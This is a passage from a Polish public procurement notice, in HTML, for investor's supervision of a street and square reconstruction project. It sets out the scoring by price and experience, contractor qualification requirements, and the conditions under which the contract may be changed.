Warunki<br/>na jakich zostanie udzielone zamówienie: zgodnie z warunkami dotyczącymi zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się następującymi<br/>kryteriami, z przypisaniem im odpowiednio wag:<br/>1) cena oferty – 60%<br/>2) doświadczenie – 40%<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1)Punkty w kryterium cena brutto oferty w PLN wyliczone będą z dokładnością do<br/>dwóch miejsc po przecinku (zasada zaokrąglania trzeciego miejsca po przecinku –<br/>poniżej 5 końcówkę pomija się, powyżej i równe 5 zaokrągla się w górę) wg<br/>poniższego wzoru:<br/>Cmin<br/>C= ------------------ x 60 pkt.<br/>Cx<br/>gdzie:<br/>C – przyznane punkty w kryterium ceny oferty brutto w PLN;<br/>Cmin - najniższa cena oferty brutto w PLN spośród ofert niepodlegających odrzuceniu;<br/>Cx – cena brutto w PLN badanej oferty.<br/>2)Punkty w kryterium doświadczenie, zostaną przyznane wg następujących zasad:<br/>Doświadczenie – maksymalnie 40 pkt<br/>Wykonawca wskaże osobę, która będzie pełnić funkcję inspektora nadzoru w branży sanitarnej<br/>posiadającą doświadczenie w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego,<br/>kierownika budowy lub kierownika robót w branży sanitarnej nad:<br/>- dwoma lub mniej zadaniami w zakresie budowy lub przebudowy drogi – 10 pkt;<br/>- trzema zadaniami w zakresie budowy lub przebudowy drogi – 20 pkt;<br/>- czterema zadaniami w zakresie budowy lub przebudowy drogi – 30 pkt;<br/>- pięcioma lub więcej zadaniami w zakresie budowy lub przebudowy drogi – 40 pkt;<br/>3. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie<br/>ze wszystkich kryteriów. Ocenę łączną oferty stanowi suma punktów uzyskanych w ramach<br/>poszczególnych kryteriów. Zamawiający wyliczy ocenę łączą ocenianych ofert na podstawie<br/>poniższego wzoru:<br/>E = C + X<br/>gdzie:<br/>E – łączna liczba punktów otrzymana przez ofertę we wszystkich kryteriach oceny,<br/>C – liczba punktów w kryterium ceny oferty brutto w PLN,<br/>X – liczba punktów w kryterium doświadczenie.<br/>4. Zamawiający będzie zaokrąglał punkty do dwóch miejsc po przecinku w każdym wskaźniku.<br/>Zasada zaokrąglenia dotyczy trzeciego miejsca po przecinku – poniżej 5 końcówkę pominie,<br/>powyżej i równe 5 zaokrągli w górę.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym ofert<br/>dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Pełnienie nadzoru inwestorskiego nad zadaniem pn. Przebudowa układu<br/>komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych<br/>wraz z modernizacją Skweru Rybaka w branży elektrycznej.<br/>2. Prace wykonywane będą na podstawie dokumentacji projektowej pn. Przebudowa Skweru<br/>Rybaka wraz z budową, przebudową, remontem budowli i obiektów małej architektury, m. in.:<br/>pomnika, fontanny wraz z podziemnymi komorami technologicznymi, ławek, leżaków, śmietników,<br/>donic, latarni, podziemnej kapsuły czasu, stojaków rowerowych, punktu naprawy rowerów,<br/>urządzeń placu zabaw, poidełka; budowa parkingu dla kolejek turystycznych i elektrycznych<br/>wózków pasażerskich; budowa budynku toalety publicznej; remont istniejącego pomnika;<br/>przebudowa układu komunikacyjnego ulic: Nad Ujściem, Krótka, Tysiąclecia, Wojska Polskiego,<br/>Morska, Kościuszki wraz z budową obiektów małej architektury, m. in.: ławek i śmietników;<br/>przebudową i budową infrastruktury technicznej, m. in. sieci, przyłączy i instalacji: kanalizacji<br/>deszczowej, kanalizacji sanitarnej, wodociągowej, elektroenergetycznej, teletechnicznej,<br/>oświetlenia terenu i obiektów, technologii fontanny; budową kanału technologicznego; rozbiórka<br/>istniejących elementów zagospodarowania terenu, wykonanej przez Pniewski Architekci Sp. z o.o.<br/>81-389 Gdynia ul. Świętojańska 79/9 stanowiącej załącznik nr 7 do niniejszej SWZ.<br/>3. Szczegółowy zakres w/w prac do wykonania, określony został w dokumentacji projektowej<br/>budowlanej, specyfikacjach technicznych wykonania i odbioru robót, które stanowią załącznik nr 7<br/>SWZ. Dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz opis<br/>przedmiotu zamówienia znajdujący się w SWZ obejmują całość zadania inwestycyjnego.<br/>Załączone do SWZ przedmiary robót nie są obowiązujące i stanowią jedynie materiał<br/>pomocniczy dla Wykonawcy robót budowlanych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 7500 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt. 7 <br/>ustawy Prawo zamówień publicznych, polegających na powtórzeniu podobnych usług,<br/>zgodnych z przedmiotem zamówienia podstawowego. Przedmiot zamówienia: podobne usługi zgodne z przedmiotem zamówienia podstawowego o kodach CPV określonych w tym<br/>zamówieniu. Wielkość lub zakres zamówienia: do 20% wartości zamówienia podstawowego. Warunki<br/>na jakich zostanie udzielone zamówienie: zgodnie z warunkami dotyczącymi zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się następującymi<br/>kryteriami, z przypisaniem im odpowiednio wag:<br/>1) cena oferty – 60%<br/>2) doświadczenie – 40%<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1)Punkty w kryterium cena brutto oferty w PLN wyliczone będą z dokładnością do<br/>dwóch miejsc po przecinku (zasada zaokrąglania trzeciego miejsca po przecinku –<br/>poniżej 5 końcówkę pomija się, powyżej i równe 5 zaokrągla się w górę) wg<br/>poniższego wzoru:<br/>Cmin<br/>C= ------------------ x 60 pkt.<br/>Cx<br/>gdzie:<br/>C – przyznane punkty w kryterium ceny oferty brutto w PLN;<br/>Cmin - najniższa cena oferty brutto w PLN spośród ofert niepodlegających odrzuceniu;<br/>Cx – cena brutto w PLN badanej oferty.<br/>2)Punkty w kryterium doświadczenie, zostaną przyznane wg następujących zasad:<br/>Doświadczenie – maksymalnie 40 pkt<br/>Wykonawca wskaże osobę, która będzie pełnić funkcję inspektora nadzoru w branży elektrycznej<br/>posiadającą doświadczenie w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego,<br/>kierownika budowy lub kierownika robót w branży elektrycznej nad:<br/>- dwoma lub mniej zadaniami w zakresie budowy lub przebudowy drogi – 10 pkt;<br/>- trzema zadaniami w zakresie budowy lub przebudowy drogi – 20 pkt;<br/>- czterema zadaniami w zakresie budowy lub przebudowy drogi – 30 pkt;<br/>- pięcioma lub więcej zadaniami w zakresie budowy lub przebudowy drogi – 40 pkt;<br/>3. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie<br/>ze wszystkich kryteriów. Ocenę łączną oferty stanowi suma punktów uzyskanych w ramach<br/>poszczególnych kryteriów. Zamawiający wyliczy ocenę łączą ocenianych ofert na podstawie<br/>poniższego wzoru:<br/>E = C + X<br/>gdzie:<br/>E – łączna liczba punktów otrzymana przez ofertę we wszystkich kryteriach oceny,<br/>C – liczba punktów w kryterium ceny oferty brutto w PLN,<br/>X – liczba punktów w kryterium doświadczenie.<br/>4. Zamawiający będzie zaokrąglał punkty do dwóch miejsc po przecinku w każdym wskaźniku.<br/>Zasada zaokrąglenia dotyczy trzeciego miejsca po przecinku – poniżej 5 końcówkę pominie,<br/>powyżej i równe 5 zaokrągli w górę.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym ofert<br/>dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu o<br/>zamówieniu i niniejszej SWZ.<br/>2. Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych w art.<br/>112 ust. 2 ustawy pzp dotyczących zdolności technicznej i zawodowej:<br/>Część I: Pełnienie nadzoru inwestorskiego nad zadaniem pn. Przebudowa układu<br/>komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych<br/>wraz z modernizacją Skweru Rybaka w branży drogowej<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi:<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia wraz z:<br/>- decyzją o nadaniu uprawnień budowlanych do kierowania robotami budowlanymi bez<br/>ograniczeń w specjalności drogowej, których zakres będzie obejmował sprawowanie<br/>nadzoru inwestorskiego; w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo Budowlane (tj. Dz.<br/>9<br/>U. 2021 poz. 2351) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia<br/>2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie (Dz. U. 2019 poz. 831); w przypadku wykonawców<br/>zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w innych<br/>państwach, uznane w myśl art. 12a ustawy Prawo Budowlane (tj. Dz. U. 2021 poz. 2351);<br/>- aktualnym zaświadczeniem o przynależności do właściwej terenowo izby samorządu<br/>zawodowego;<br/>- informacjami dot. doświadczenia w zakresie pełnienia funkcji inspektora nadzoru<br/>inwestorskiego, kierownika budowy lub kierownika robót w branży drogowej, w okresie<br/>ostatnich 5 lat od dnia w którym upływa termin składania ofert, nad zadaniami które w swoim<br/>zakresie miały budowę lub przebudowę drogi (należy przez to rozumieć budowę lub<br/>przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021<br/>r., poz. 2351).<br/>2) Część II: Pełnienie nadzoru inwestorskiego nad zadaniem pn. Przebudowa układu<br/>komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych<br/>wraz z modernizacją Skweru Rybaka w branży sanitarnej;<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi:<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia wraz z:<br/>- decyzją o nadaniu uprawnień budowlanych do kierowania robotami budowlanymi bez<br/>ograniczeń w specjalności instalacyjnej w zakresie sieci i urządzeń gazowych,<br/>wodociągowych i kanalizacyjnych, których zakres będzie obejmował sprawowanie nadzoru<br/>inwestorskiego; w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo Budowlane (tj. Dz. U. 2021<br/>poz. 2351) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w<br/>sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. 2019 poz. 831); w przypadku wykonawców zagranicznych dopuszcza<br/>się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl<br/>art. 12a ustawy Prawo Budowlane (tj. Dz. U. 2021 poz. 2351);<br/>- aktualnym zaświadczeniem o przynależności do właściwej terenowo izby samorządu<br/>zawodowego;<br/>- informacjami dot. doświadczenia w zakresie pełnienia funkcji inspektora nadzoru<br/>inwestorskiego, kierownika budowy lub kierownika robót w branży sanitarnej, w okresie<br/>ostatnich 5 lat od dnia w którym upływa termin składania ofert, nad zadaniami które w swoim<br/>zakresie miała budowę lub przebudowę drogi (należy przez to rozumieć budowę lub<br/>przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021<br/>r., poz. 2351).<br/>3) Część III: Pełnienie nadzoru inwestorskiego nad zadaniem pn. Przebudowa układu<br/>komunikacyjnego ulic Kościuszki, Morskiej i Wojska Polskiego oraz ulic przyległych<br/>wraz z modernizacją Skweru Rybaka w branży elektrycznej;<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi:<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia wraz z:<br/>- decyzją o nadaniu uprawnień budowlanych do kierowania robotami budowlanymi bez<br/>ograniczeń w specjalności instalacyjnej w zakresie sieci i urządzeń elektrycznych i<br/>elektroenergetycznych, których zakres będzie obejmował sprawowanie nadzoru<br/>inwestorskiego; w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo Budowlane (tj. Dz. U. 2021<br/>poz. 2351) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w<br/>sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. 2019 poz. 831); w przypadku wykonawców zagranicznych dopuszcza<br/>się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl<br/>art. 12a ustawy Prawo Budowlane (tj. Dz. U. 2021 poz. 2351);<br/>- aktualnym zaświadczeniem o przynależności do właściwej terenowo izby samorządu<br/>zawodowego;<br/>- informacjami dot. doświadczenia w zakresie pełnienia funkcji inspektora nadzoru<br/>inwestorskiego, kierownika budowy lub kierownika robót w branży elektrycznej, w okresie<br/>ostatnich 5 lat od dnia w którym upływa termin składania ofert, nad zadaniami które w swoim<br/>zakresie miały budowę lub przebudowę drogi (należy przez to rozumieć budowę lub<br/>przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021<br/>r., poz. 2351).<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>w stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>5. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu (wzór - załącznik nr 4 SWZ) udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu<br/>udostępniającego zasoby ma potwierdzać, że stosunek łączący Wykonawcę z podmiotami<br/>11<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu w postaci elektronicznej<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, a<br/>następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku archiwum (ZIP)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych potwierdzających spełnianie warunków<br/>udziału w postępowaniu:<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji przedmiotu zamówienia<br/>wraz z decyzją o nadaniu uprawnień budowlanych do kierowania robotami budowlanymi bez<br/>ograniczeń w danej specjalności, których zakres będzie obejmował sprawowanie nadzoru<br/>inwestorskiego, w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo Budowlane (tj. Dz. U. 2021 poz.<br/>2351) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie<br/>(Dz. U. 2019 poz. 831); aktualnym zaświadczeniem o przynależności do właściwej terenowo izby<br/>samorządu zawodowego; informacjami dot. doświadczenia w zakresie pełnienia funkcji inspektora<br/>nadzoru inwestorskiego, kierownika budowy lub kierownika robót w danej specjalności, w okresie<br/>ostatnich 5 lat od dnia w którym upływa termin składania ofert, nad zadaniami które w swoim<br/>zakresie miały budowę lub przebudowę drogi (należy przez to rozumieć budowę lub przebudowę w<br/>rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021 r., poz. 2351) - z<br/>załączeniem dowodów określających czy te usługi zostały wykonane, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty (wzór wykazu - załącznik<br/>nr 5 do SWZ);<br/>2. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać<br/>Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w<br/>zakresie i sposób określony w przepisach rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z<br/>tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty<br/>należy załączyć pełnomocnictwo dla pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>2. Wykonawca dołącza do oferty oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy, którego<br/>wzór stanowią załączniki nr 2 i 3 do SWZ. Oświadczenie stanowi dowód potwierdzający brak<br/>podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym<br/>mowa powyżej - załączniki nr 2 i 3 do SWZ, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana w zakresie wysokości wynagrodzenia może nastąpić w razie<br/>zaistnienia okoliczności: stawki podatku od towarów i usług oraz podatku akcyzowego, wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości<br/>stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne, zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę <br/>2. Zmiana w zakresie terminu realizacji:<br/>a)wydanie decyzji administracyjnej przez organ nadzoru budowlanego lub ochrony środowiska<br/>o wstrzymaniu robót;<br/>b)wstrzymanie robót przez Zamawiającego lub przez uprawnione organy;<br/>c)wystąpienie nieprzewidzianych zjawisk atmosferycznych;<br/>d)wystąpienia siły wyższej, rozumianej jako zdarzenie niemożliwe do przewidzenia, na które Strony nie<br/>mają wpływu i są przez Strony niemożliwe do pokonania, a w szczególności: klęski żywiołowe, wojny,<br/>zamknięcie granic uniemożliwiające wykonanie umowy w całości lub w części, pod warunkiem<br/>dostarczenia w terminie 5 dni od dnia zaistnienia siły wyższej, przez Stronę dotkniętą wystąpienie siły<br/>wyższej, dokumentu potwierdzającego zaistnienie siły wyższej wystawionego przez właściwy organ<br/>administracji publicznej oraz wskazania wpływu zdarzenia na wykonanie umowy, i jeśli wystąpienie<br/>siły wyższej wpłynął bezpośrednio na prawidłowe wykonywanie robót i termin ich wykonania to<br/>termin wykonania umowy zostanie przedłużony o czas jej trwania;<br/>e)w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego<br/>wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie<br/>zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody niewspółmiernie<br/>większej niż spowodowana działaniem lub zaniechaniem;<br/>f)wystąpienie warunków gruntowo – wodnych uniemożliwiających wykonanie<br/>(prowadzenie)robót budowlanych zgodnie ze sztuką budowlaną, przeprowadzenie prób i<br/>sprawdzeń, dokonywanie odbiorów;<br/>g)zmiana spowodowana nieprzewidzianymi w specyfikacji warunkami geologicznymi, archeologicznymi<br/>lub terenowymi, w szczególności istnieniem niezinwentaryzowanych lub błędnie zinwentaryzowanych<br/>obiektów budowlanych lub niewypałów lub niewybuchów lub wykopalisk archeologicznych, itp.;<br/>h)konieczność usunięcia błędów lub wad w dokumentacji projektowej albo konieczność<br/>wprowadzenia zmian w dokumentacji projektowej lub specyfikacjach technicznych<br/>wykonania i odbioru robót, które maja wpływ na termin wykonania przedmiotu umowy;<br/>i)konieczność zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy zastosowaniu<br/>odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji projektowej,<br/>a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu o które<br/>je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub<br/>nienależytym wykonaniem przedmiotu umowy;<br/>j)konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu<br/>Umowy, które wstrzymują lub opóźniają realizację przedmiotu Umowy;<br/>k)wystąpienie niebezpieczeństwa 